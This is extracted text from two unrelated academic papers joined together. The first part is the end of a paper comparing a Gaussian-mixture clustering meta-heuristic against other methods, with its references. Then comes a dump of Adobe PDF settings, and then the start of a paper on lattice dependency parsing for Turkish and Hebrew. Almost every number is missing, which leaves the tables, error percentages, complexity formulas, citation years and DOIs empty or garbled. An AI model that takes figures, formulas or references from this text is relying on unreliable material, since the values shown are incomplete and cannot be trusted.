reported by the reviewed methods. while ts and cs are the benchmark methods, these take over , s to reach the best-known solution for the largest instance. note that for these methods, their computational times exponentially increase for instances larger than , points. in contrast, sa is very consistent with a computational time of approximately , s through all instances. ga significantly increases for instances larger than , points (up to , seconds for the largest instance). however, these methods have the largest error gaps as reviewed in fig. . the speed pattern of drg is very similar to that of ga, however, as reviewed in fig. , its error gap is the closest to the benchmark methods for instances larger than , points. table performance of drg and ckm on cccp instances when compared to best-known solutions*. instance drg error (%) ckm error (%) sjc , . . , . . sjc , . . , . . sjc a , . . , . . sjc a , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . doni , . . , . . mean= . mean= . stddev= . stddev= . table performance of drg and tcg on cccp instances when compared to best-known solutions*: (a) matlab, intel core i at . ghz and gb ram, (b) c++, intel core duo at ghz with gb ram. instance drg (a) error (%) tcg (b) error (%) ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . ta , . . , . . sjc , . . , . . sjc , . . , . . sjc a , . . , . . sjc a , . . , . . mean= . mean= . stddev= . stddev= . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . . . . . . . . . . . ta ta . . . . . ta . . . . . . . . . . . doni doni doni doni doni doni doni doni doni ta ta ta ta ta ta ta . . . . . . . . . . . e rr or g ap (% ) n ckm vns sa ga drg tcg sa ga drg ckm vns tcg ts/cs (best-known) figure comparison of error gap vs. size of the instance. full-size doi: . /peerj-cs. /fig- . . ta . . . . instancebest known tcg % drg % . . . ta . . . . sjc . . . . . . . . ta . . . . sjc . . . . . . . ta . . . . sjc a . . . . . ta . . sjc a . . . . . ta . ta . . . . . ta . . ta . . . . . ta ta . . . . . ta ta . . . . . ta ta . . . . . ta . ta . . . . . sjc . ta . . . . . sjc . . . sjc a . . . sjc a . . . % % % normalized errors max= . instances n vns sa ga drg ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . ta . . . . sjc . . . . sjc . . . . sjc a . . . . sjc a . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . doni . . . . e xe cu tio n t im e (s ec on ds ) n sa ga drg tcg cs ts sa ga drg cs (best-known) ts tcg figure comparison of speed vs. size of the instance. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is important to mention that this comparison may not be fair due to the differences in the programming language and the hardware used for implementation and testing of all the methods. in order to compare running speed all methods should be tested with the same hardware and be implemented with the same programming language by the same software developer (the developer’s expertise may also affect the speed performance of the software). due to the difficulty of achieving this task, in practice the comparison is commonly performed on the best results obtained by other methods as performed in chaves & nogueira-lorena ( ) and fernandes-muritiba et al. ( ). running time is measured in order to determine if the proposed method can provide a solution within reasonable time considering standard resources of hardware and software. due to this situation, the drg can provide very suitable results (< . % error gap) within very reasonable time. conclusions and future work both, the application of gaussian probability functions and the em algorithm have not been explored in the literature as solving techniques for facility location problems (e.g., cccp). an important aspect for the application of gmms is the reduction of dispersion to accomplish more efficient clustering and convergence of the em algorithm. hence, the proposed drg meta-heuristic provides important insights about the suitability of these techniques for the cccp and the challenges to improve its performance. regarding performance, ts and cs are the most competitive solving methods for the cccp and thus, were considered as benchmark methods with mean average error of . % and . % respectively. the proposed drg meta-heuristic performed as the closest best method with a mean error gap smaller than . % and there is evidence than it can provide these results faster when compared to ts and cs for large instances (> , points). hence, the drg meta-heuristic can be a suitable alternative when compared to cs and ts regarding time, and a more efficient method when compared to vns, sa, ga, and ckm. the future work is focused on improving the performance of the drg based on the following key aspects: � the em algorithm was found to be functional with up to gaussian components for the clustering process (see discussion on section “dispersion reduction in gmms performance for the cccp”). in this case the analysis of the infinite gaussian mixture model described in rasmussen ( ) may lead to overcome this restriction. � while most optimization methods such as those based on mixed integer linear programming (milp) or meta-heuristics are purely quantitative, modeling of qualitative criteria may improve the optimization task. in example, in hadi-vencheh & mohamadghasemi ( ) a methodology that integrated the analytic hierarchy process (ahp) and a nonlinear programming model (nlp) provided very suitable solution for a facility layout problem. such approach may lead to improve the solving methods for other logistic problems such as the facility location problem. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � integration with state-of-the-art meta-heuristics such as migrating birds optimization (mbo) (niroomand et al., ) and mat-heuristics (sartori & buriol, ). additional information and declarations funding the author received no funding for this work. competing interests the author declares that they have no competing interests. author contributions � santiago-omar caballero-morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code and test instances of the considered databases are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bishop cm. . pattern recognition and machine learning. new york: springer science and business media, llc. carvalho r, mendes g, azeredo-chaves f. . a heuristic for the capacitated clustering problem. in: in proceeding of the xlix simposio brasileiro de pesquisa operacional. – . chaves aa, correa fa, lorena lan. . clustering search heuristic for the capacitated p-median problem. advances in software computing series : – . chaves aa, nogueira-lorena la. . clustering search algorithm for the capacitated centered clustering problem. computers & operations research ( ): – doi . /j.cor. . . . chaves aa, nogueira-lorena la. . hybrid evolutionary algorithm for the capacitated centered clustering problem. expert systems with applications ( ): – doi . /j.eswa. . . . de-oliveira acm, chaves aa, nogueira-lorena la. . clustering search. pesquisa operacional ( ): – doi . /s - . fernandes-muritiba ae, negreiros m, gois-oria hl, ferreira de souza m. . a tabu search algorithm for the capacitated centred clustering problem. in: congreso latino- iberoamericano de investigacion operativa (claio)— simposio brasileiro de pesquisa operacional (sbpo). – . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forsyth d. . lecture notes of cs signals ai: gaussian classifiers. illinois: university of illinois, urbana-champaign. fraley c, raftery a. . how many clusters? which clustering method? answers via model- based cluster analysis. computer journal ( ): – doi . /comjnl/ . . . hadi-vencheh a, mohamadghasemi a. . an integrated ahp–nlp methodology for facility layout design. journal of manufacturing systems ( ): – doi . /j.jmsy. . . . hansen p, jaumard b. . cluster analysis and mathematical programming. mathematical programming : – . herda m. . combined genetic algorithm for capacitated p-median problem. in: proc. of the th ieee international symposium on computational intelligence and informatics, cinti . piscataway: ieee, – . mahmoodi-darani n, ahmadi v, saadati eskandari z, yousefikhoshbakht m. . solving the capacitated clustering problem by a combined meta-heuristic algorithm. journal of advances in computer research ( ): – . mclachlan gf, rathnayake s. . on the number of components in a gaussian mixture model. wiley interdisciplinary reviews: data mining and knowledge discovery ( ): – doi . /widm. . mohamadghasemi a, hadi-vencheh a. . an integrated synthetic value of fuzzy judgments and nonlinear programming methodology for ranking the facility layout patterns. computers & industrial engineering ( ): – doi . /j.cie. . . . mohammed m, badruddin m, mohammed e. . machine learning: algorithms and applications. milton park: crc press, taylor & francis group. negreiros m, palhano a. . the capacitated centred clustering problem. computers & operations research ( ): – doi . /j.cor. . . . niroomand s, hadi-vencheh a, sahin r, vizvari b. . modified migrating birds optimization algorithm for closed loop layout with exact distances in flexible manufacturing systems. expert systems with applications ( ): – doi . /j.eswa. . . . palhano a, negreiros m, laporte g. . a constrained k-median procedure for the capacitated centered clustering problem. in: proceeding of the xiv congreso latino ibero americano de investigacion de operaciones, claio . pereira wm, carvalho r. . ils-pr: an efficient heuristic for the capacitated centered clustering problem. proceeding series of the brazilian society of computational and applied mathematics ( ): – . pereira ma, senne lf. . a column generation method for the capacitated centred clustering problem. in: proceedings of the vi alio/euro workshop on applied combinatorial optimization. – . radiah s, hasnah n, omar m. . an alternative heuristic for capacitated p-median problem (cpmp). in: proceeding of the ieee business engineering and industrial applications colloquium, beiac . – . rasmussen c. . the infinite gaussian mixture model. in: solla sa, leen tk, müller kr, eds. advances in neural information processing systems. vol. . cambridge: mit press, – . sartori cs, buriol ls. . a study on the pickup and delivery problem with time windows: matheuristics and new instances. computers & operations research ( ): – doi . /j.cor. . . theodoridis s, koutroumbas k. . pattern recognition. second edition. san diego: elsevier academic press. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /j.jmsy. . . http://dx.doi.org/ . /widm. http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.cor. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ theodoridis s, koutroumbas k. . an introduction to pattern recognition: a matlab approach. cambridge: academic press. yousefikhoshbakht m, khorram e. . solving the vehicle routing problem by a hybrid meta- heuristic algorithm. journal of industrial engineering international ( ): – doi . / - x- - . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - x- - https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. solution strategy based on gaussian mixture models and dispersion reduction for the capacitated centered clustering problem introduction clustering drg meta-heuristic results and assessment conclusions and future work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice a graph-based lattice dependency parser for joint morphological segmentation and syntactic analysis wolfgang seeker and özlem çetinoğlu institut für maschinelle sprachverarbeitung university of stuttgart {seeker,ozlem}@ims.uni-stuttgart.de abstract space-delimited words in turkish and he- brew text can be further segmented into mean- ingful units, but syntactic and semantic con- text is necessary to predict segmentation. at the same time, predicting correct syntac- tic structures relies on correct segmentation. we present a graph-based lattice dependency parser that operates on morphological lattices to represent different segmentations and mor- phological analyses for a given input sentence. the lattice parser predicts a dependency tree over a path in the lattice and thus solves the joint task of segmentation, morphological analysis, and syntactic parsing. we conduct experiments on the turkish and the hebrew treebank and show that the joint model outper- forms three state-of-the-art pipeline systems on both data sets. our work corroborates find- ings from constituency lattice parsing for he- brew and presents the first results for full lat- tice parsing on turkish. introduction linguistic theory has provided examples from many different languages in which grammatical informa- tion is expressed via case marking, morphological agreement, or clitics. in these languages, configura- tional information is less important than in english since the words are overtly marked for their syntac- tic relations to each other. such morphologically rich languages pose many new challenges to today’s natural language processing technology, which has often been developed for english. one of the first challenges is the question on how to represent morphologically rich languages and what are the basic units of analysis (tsarfaty et al., ). the turkish treebank (oflazer et al., ), for example, represents words as sequences of inflectional groups, semantically coherent groups of morphemes separated by derivational boundaries. the treebank for modern hebrew (sima’an et al., ) chooses morphemes as the basic unit of rep- resentation. a space-delimited word in the treebank can consist of several morphemes that may belong to independent syntactic contexts. both turkish and hebrew show high amounts of ambiguity when it comes to the correct segmentation of words into inflectional groups and morphemes, respectively. within a sentence, however, these am- biguities can often be resolved by the syntactic and semantic context in which these words appear. a standard (dependency) parsing system de- cides segmentation, morphological analysis (includ- ing pos), and syntax one after the other in a pipeline setup. while pipelines are fast and efficient, they cannot model interaction between these different levels of analysis, however. it has therefore been argued that joint modeling of these three tasks is more suitable to the problem (tsarfaty, ). in previous research, several transition-based parsers have been proposed to model pos/morphological tagging and parsing jointly (hatori et al., ; bohnet and nivre, ; bohnet et al., ). such parsing systems have been further extended to also solve the segmentation problem in chinese (ha- tori et al., ; li and zhou, ; zhang et al., ). transition-based parsers are attractive since transactions of the association for computational linguistics, vol. , pp. – , . action editor: joakim nivre. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. they do not rely on global optimization and thus deal well with the increased model complexity that comes with joint modeling. nonetheless, graph- based models have been proposed as well, e.g. by li et al. ( ) for joint pos tagging and dependency parsing. their parsers model the joint problem di- rectly at the cost of increased model complexity. in this paper, we present a graph-based depen- dency parser for lattice parsing that handles the in- creased complexity by applying dual decomposi- tion. the parser operates on morphological lat- tices and predicts word segmentation, morphologi- cal analysis, and dependency syntax jointly. it de- composes the problem into several subproblems and uses dual decomposition to find a common solution (koo et al., ; martins et al., ). the sub- problems are defined such that they can be solved ef- ficiently and agreement is found in an iterative fash- ion. decomposing the problem thus keeps the com- plexity of the joint parser on a tractable level. we test the parser on the turkish and the he- brew treebank. the segmentation problem in these languages can be tackled with the same approach even though their underlying linguistic motivation is quite different. in our experiments, the lattice de- pendency parser outperforms three state-of-the-art pipeline systems. lattice parsing for hebrew has been thoroughly investigated in constituency pars- ing (cohen and smith, ; goldberg and tsarfaty, ; goldberg and elhadad, ), demonstrating the viability of joint modeling. to the best of our knowledge, our work is the first to apply full lattice parsing to the turkish treebank. we introduce the segmentation problem in turk- ish and hebrew in section and present the lattice parser in section . sections and describe the experiments and their results and we discuss related work in section . we conclude with section . word segmentation in turkish and hebrew a lot of morphosyntactic information is overtly marked on words in morphologically rich languages. it is also common to express syntactic informa- tion through derivation or composition. as a con- sequence these words, orthographically written to- gether, actually have word-internal syntactic struc- tures. moreover, word-external relations may de- pend on the word-internal structures, e.g., a word could be grammatically related to only parts of an- other word instead of the whole. for instance, in the turkish sentence ekmek aldım, each word has two analyses. ekmek means ‘bread’ or the nominal ‘planting’ which is derived from the verb stem ek ‘plant’ with the nominalization suffix mek. aldım has the meaning ‘i bought’ which de- composes as al-dı-m ‘buy-past- sg’. it also means ‘i was red’, which is derived from the adjective al ‘red’, inflected for past tense, st person singular. depending on the selected morphological analy- sis for each word, syntax and semantics of the sen- tence change. when the first analysis is selected for both words, the syntactic representation of the sen- tence is given in figure , which corresponds to the meaning ‘i bought bread’. when the nominal ‘plant- ing’ is selected for the first word, it is a grammatical sentence albeit with an implausable meaning. when the derivational analysis of the second word is se- lected, regardless of the morphological analysis of the first word, the sentence is ungrammatical due to subject-verb agreement failure. although all mor- phological analyses for these two words are correct in isolation, when they occur in the same syntactic context only some combinations are grammatical. ekmek aldım noun+nom verb+past+ sg obj i bought bread. figure : dependency representation for ekmek aldım. this small example demonstrates that the syntac- tic structure depends on the morphological disam- biguation of the words. at the same time, it shows that syntax can help pick the right morphological analysis. for a joint system to decide the morphological and syntactic representation together, all possible analyses must be available to the system. the pos- sible morphological analyses of a word can be effi- ciently represented in a lattice structure. the lattice representation of the sentence in figure is given in figure , with double circles denoting word bound- aries. a sentence lattice is the concatenation of its word lattices. a morphological analysis of a word is a full path from the initial state to the final state of its lattice. labels on the transitions are the surface form and underlying morphological representation of segments. ekmek /noun+nom ek /verb mek /inf+noun+nom aldım/verb+past+ sg al /adj dım/verb+past+ sg figure : a morphological lattice for ekmek aldım. lattices also capture well the segmentation of words in hebrew. different from turkish, hebrew segments can be syntactic units like determiners, prepositions, or relativizers attached to stem seg- ments. in an example given by goldberg and tsar- faty ( ), the word hneim ‘the pleasant/made- pleasant’ has three analyses corresponding to the lat- tice in figure . hneim/vb h/dt neim/vb neim/jj figure : the lattice for hneim (goldberg and tsarfaty, ). both the hebrew and the turkish treebank anno- tate dependencies between units smaller than words. in the turkish treebank, a space-delimited word is segmented into one or more segments depending on its morphological representation. the number of segments is determined by the number of deriva- tions. if it was derived n times, it is represented as n+ segments. the derivational boundaries are part of the morphological representation. in the turkish dependency parsing literature (eryiğit et al., ; çetinoğlu and kuhn, ) these segments surface forms on the transitions are given for convenience. in the turkish treebank, only final segments have surface forms (of full words), the surface forms of non-final segments are rep- resented as underscores. are called inflectional groups (igs). igs consist of one or more inflectional morphemes. the head of a non-final ig is the ig to its right with a dependency relation deriv. the head of a final ig could be any ig of another word. the hebrew treebank defines relations between morphemes (sima’an et al., ). those mor- phemes correspond to what is usually considered a separate syntactic unit in english. in hebrew script, word classes like prepositions and conjunctions are always written together with the following word. contrary to turkish, syntactic heads of both non- final and final segments can be internal or external to the same space-delimited word. for convenience, we will use token to refer to the smallest unit of processing for the remainder of the paper. it corresponds to igs in turkish and mor- phemes in hebrew. a transition in a morphological lattice therefore represents one token. we will use word to refer to space-delimited words. in stan- dard parsing, these two terms usually coincide with a token in a sentence being separated from the sur- rounding ones by space. lattice parsing one can think of lattice parsing as two tasks that the parser solves simultaneously: the parser needs to find a path through the lattice and it needs to find a parse tree. importantly, the parser solves this task under the condition that the parse tree and the path agree with each other, i.e. the tokens that the parse tree spans over must form the path through the lat- tice. decomposing the problem in this way defines the three components for the parser. let x be an input lattice and t = {root, t , t , . . . , tn} be the set of tokens in x. in what follows, we assume two different struc- tures, lattices and dependency trees. dependency trees are represented as directed acyclic trees with a special root node (root), whereas lattices are directed acyclic graphs with one defined start state and one defined end state (see figures and ). for dependency trees, we will use the terms node and arc to refer to the vertices and the edges between the vertices, respectively. tokens are represented as this is a technical definition of word and has no ambition to make claims about the linguistic definition of a word. nodes in the dependency tree. for lattices, we use the terms state and transition to refer to the vertices and their edges in the lattice. tokens are represented as transitions between states in the lattice. find the path. a token bigram in a lattice x is a pair of two transitions 〈t,t′〉, such that the target state of t in x coincides with the source state of t′ in x. a chain of overlapping bigrams that starts from the initial state and ends in the final state forms a path through the lattice. we represent the root to- ken as the first transition, i.e. a single transition that leaves the initial state of the lattice. given a lattice x, we define the index set of to- ken bigrams in the lattice to be s := {〈t,t′〉 |t,t′ ∈ t, target(x,t) = source(x,t′)}. for later, we fur- thermore define s|t := {〈k,t〉 |〈k,t〉 ∈ s, k ∈ t } to be the set of bigrams that have t at the second position. a consecutive path through the lattice is defined as an indicator vector p := 〈ps〉s∈s where ps = means that bigram s is part of the path, oth- erwise ps = . we define p as the set of all well- formed paths, i.e. all paths that lead from the initial to the final state. we use a linear model that factors over bigrams. given a scoring function fp that assigns scores to paths, the path with the highest score can be found by p̂ = arg max p∈p fp(p) with fp(p) = ∑ s∈s ps w ·φseg(s) where φseg is the feature extraction function for to- ken bigrams. the highest-scoring path through the lattice can be found with the viterbi algorithm. we use this bigram model later also as a standalone disambiguator for morphological lattices to find the highest-scoring path in a lattice. find the tree. we define the index set of arcs in a dependency tree as a := {〈h,d,l〉 |h ∈ t,d ∈ t −{root}, l ∈ l,h = d} with l being a set of dependency relations. a dependency tree is defined as an indicator vector y := 〈ya〉a∈a where ya = means that arc a is in the parse, otherwise ya = . we define y to be the set of all well-formed depen- dency trees. we follow koo et al. ( ) and assume an arc- factored model (mcdonald et al., ) to find the highest-scoring parse. given a scoring function ft that assigns scores to parses, the problem of finding the highest scoring parse is defined as ŷ = arg max y∈y ft(y) with ft(y) = ∑ a∈a ya w ·φarc(a) where φarc is the feature extraction function for sin- gle arcs and w is the weight vector. we use the chu- liu-edmonds algorithm (cle) to find the highest- scoring parse (chu and liu, ; edmonds, ). note that the algorithm includes all tokens of the lat- tice into the spanning tree, not just some tokens on some path. chu-liu-edmonds furthermore enforces the tree properties of the output, i.e. acyclicity and exactly one head per token. agreement constraints. to make the path and the parse tree agree with each other, we introduce an additional dependency relation norel into l. we define a token that is attached to root with rela- tion norel to be not on the path through the lattice. these arcs are not scored by the statistical model, they simply serve as a means for cle to mark to- kens as not being part of the path by attaching them to root with this relation. the parser can predict the norel label only on arcs attached to root. we introduce two agreement constraints to ensure that (i) all tokens not on the path are marked with norel and must be attached to root and (ii) to- kens cannot be dependents of tokens marked with norel. the first constraint is implemented as an xor (⊕) factor (martins et al., b) over token bigrams and arcs. it states that for a token t, either one of its bigrams or its norel-arc must be active. there is one such constraint for each token in the lattice. ⊕ s∈s|t ps ⊕y〈root,t,norel〉 for all t ∈ t ( ) the second constraint ensures that a token that is part of the path will not be attached to a token that the lattice ensures that always only one of the bigrams with the same token in second position can be part of a path. is not. it thus guarantees the coherence of the de- pendency tree over the path through the lattice. it is implemented as an implication (=⇒) factor (mar- tins et al., ). it states that an active norel arc for a token h implies an inactive arc for all arcs hav- ing h as head. there is one such constraint for each possible arc in the parse. y〈root,h,norel〉 =⇒ ¬y〈h,d,l〉 ( ) for all 〈h,d,l〉 ∈ a,h = root, l = norel deciding on a path through the lattice partitions the tokens into two groups: the ones on the path and the ones that are not. by means of the norel label, the cle is also able to partition the tokens into two groups: the root-norel tokens and the proper dependency tree tokens. the two agreement constraints then make sure that the two partionings agree with each other. the first constraint explicitly links the two partitionings by requiring each token to either belong to the path or to the root-norel tokens. the second constraint ensures that the par- titioning by the cle is consistent, i.e. tokens at- tached to root with norel cannot mix with the other tokens in the tree structure. before the parser outputs the parse the tokens that do not belong to the path/tree are discarded. the objective function of the lattice parser is arg max y∈y,p∈p ft(y) + fp(p) subject to the two agreement constraints in equa- tions ( ) and ( ). we use alternating directions dual decomposi- tion or ad (martins et al., a) to find the op- timal solution to this constrained optimization prob- lem. cle can be implemented such that its worst case complexity is o(t ), while the viterbi algo- rithm needed to find the path is of worst case com- plexity o(qt ), where q is the number of states in the lattice. instead of combining these two prob- lems directly, which would multiply their complex- ity, ad combines them additively, such that the complexity of the parser is o(k(t + qt )) with k being the number of iterations that ad is run. http://www.ark.cs.cmu.edu/ad / second-order parsing. to facilitate second-order features, we use grandparent-sibling head automata as proposed in koo et al. ( ), which we extend to include dependency relations. the head automata allow the parser to model consecutive sibling and grandparent relations. the architecture of the parser does not need to be changed at all to include the second-order factors. the head automata are simply another component. they compute solutions over the same set of arc indicator variables as the cle and ad thus ensures that the output of the two algo- rithms agrees on the tree structure (koo et al., ). the second-order factors dominate the complexity of the entire parser, since solving the head automata is of complexity o(t l). pruning. we use rule-based and heuristics-based pruning to reduce the search space of the parser. arcs between tokens that lie on competing paths through the lattice are cut away as these tokens can never be in a syntactic relation. for the turkish tree- bank, we introduce an additional rule based on the annotation scheme of the treebank. in the treebank, the igs of a word form a chain with each ig having their head immediately to the right and only the last ig choosing the head freely. for the non-final igs, we therefore restrict the head choice to all igs that can immediately follow it in the lattice. in order to restrict the number of heads, we train a simple pairwise classifier that predicts the best heads for each token. it uses the first-order features of the parser’s feature model. feature model. the parser extracts features for bigrams (path), arcs (first-order), consecutive sib- lings, and grandparent relations (both second order). it uses standard features like word form, lemma, pos, morphological features, head direction, and combinations thereof. context features are more difficult in lattice pars- ing than in standard parsing as the left and right con- text of a token is not specified before parsing. we first extracted context features from all tokens that can follow or precede a token in the lattice. this led to overfitting effects as the model was learning specific lattice patterns. we therefore use latent left and right context and extract features from only one of the left/right neighbor tokens. the latent context is the left/right context token with the highest score from the path features (raw bigram scores, they are not changed by ad ). the parser extracts context from one token in each direction. distance features are also more difficult in lat- tices since the linear distance between two tokens depends on the actual path chosen by the parser. we define distance simply as the length of the shortest path between two tokens in the lattice, but this dis- tance may not coincide with the actual path. context features and distance features show that lattice dependency parsing poses interesting new challenges to feature design. using latent context features is one way of handling uncertain context, compare also the delayed features in hatori et al. ( ). a thorough investigation of different op- tions is needed here. learning. we train a discriminative linear model using passive-aggressive online learning (crammer et al., ) with cost-augmented inference (taskar et al., ) and parameter averaging (freund and schapire, ). we use hamming loss over the arcs of the parse tree excluding norel arcs. the model trains one parameter vector that includes fea- tures from the tree and from the path. the maximum number of iterations of ad is set to during training and testing. the algo- rithm sometimes outputs fractional solutions. dur- ing training, the model is updated with these frac- tional solutions, weighting the features and the loss accordingly. during testing, fractional solutions are projected to an integer solution by first running the best-path algorithm with the path posteriors output by ad and afterwards running cle on the selected path weighted by the arc posteriors (martins et al., ). in the experiments, fractional solutions occur in about % of the sentences in the turkish develop- ment set during testing. experimental setup . the turkish data the training set for turkish is the , sentences of the metu-sabancı turkish treebank (oflazer et al., ). the sentences of the itu validation set (eryiğit, ) are used for testing. as there is no separate development set, we split the training set into parts and used of them as development data. all models run on this development set are trained on the remaining parts. we also report re- sults from -fold crossvalidation on the full train- ing set ( cv). we use the detached version of the turkish tree- bank (eryiğit et al., ) where multiword expres- sions are represented as separate tokens. the train- ing set of this version contains sentences with loops. we manually corrected these sentences and use the corrected version in our experiments. the turkish raw input is first passed through a morphological analyzer (oflazer, ) in order to create morphological lattices as input to the parser. gold analyses are added to the training lattices if the morphological analyzer failed to output the correct analyses. for the pipeline systems, the input lattices are 